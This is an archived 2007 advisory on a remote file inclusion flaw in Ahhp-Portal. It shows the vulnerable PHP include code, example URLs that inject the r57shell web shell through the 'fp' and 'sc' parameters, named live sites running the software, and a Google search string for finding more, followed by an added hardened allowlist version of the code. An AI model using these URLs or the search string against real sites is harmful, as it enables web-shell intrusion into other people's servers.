Ahhp(php)-Portal Remote File Inclusion

2007-04-25T00:00:00
ID SECURITYVULNS:DOC:16838
Type securityvulns
Reporter Securityvulns
Modified 2007-04-25T00:00:00

Description

Ahhp-Portal Remote File Inclusion

Site: www.ahhope.org

Demo: http://xinan.ahtcm.edu.cn

Demo2: http://www.hfspaq.gov.cn

Vul Code:

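    <?
    // $fp and $sc are taken from the request (see the example URLs below)
    // and reach include() without any validation.
    if ($sc=='')
        include($fp.".php");
    else
        include($sc."/".$fp.".php");
    ?>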

example:

http://site/page.php?fp=r57shell?

http://site/page.php?sc=r57shell?
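
A hardened form of the include logic above, as an added example that is not part of the original advisory or the Ahhp-Portal code: page names are checked against an allowlist and the resolved path is confined to one directory. The `pages` directory, the section and page names, and the `resolve_page` helper are assumptions made for illustration.

```php
<?php
// Added example, not Ahhp-Portal code. Assumptions: pages live in a
// "pages" directory beside this script; section/page names are placeholders.
const PAGE_ROOT = __DIR__ . '/pages';

// Allowlist: section => permitted page names ('' is the top-level section).
const ALLOWED_PAGES = [
    ''     => ['home', 'about'],
    'news' => ['index', 'archive'],
];

// resolve_page() is a hypothetical helper: returns a safe absolute path or null.
function resolve_page(array $query): ?string
{
    $sc = $query['sc'] ?? '';
    $fp = $query['fp'] ?? '';

    // Reject array input (?fp[]=x) before any string handling.
    if (!is_string($sc) || !is_string($fp)) {
        return null;
    }
    // Only names listed for that section are accepted, so URLs, "../"
    // sequences and null bytes never reach include().
    if (!in_array($fp, ALLOWED_PAGES[$sc] ?? [], true)) {
        return null;
    }

    $path = PAGE_ROOT . ($sc === '' ? '' : '/' . $sc) . '/' . $fp . '.php';

    // Defence in depth: the file must exist and resolve inside PAGE_ROOT.
    $real = realpath($path);
    $root = realpath(PAGE_ROOT);
    if ($real === false || $root === false
        || strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Read parameters explicitly from $_GET instead of relying on globals.
$page = resolve_page($_GET);
if ($page === null) {
    http_response_code(404);
    exit('Not found');
}
include $page;
```

Setting `allow_url_include = Off` in php.ini (the default since PHP 5.2) additionally stops include() from fetching remote URLs if such a check is ever missed.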

////////////////////////////////////////////////////

Credit : CodeXpLoder'tq

mail : codexploder[at]hotmail[dot]com

site : expw0rm.com

Google :

"page.php?fp"

// Exploit Worm www.expw0rm.com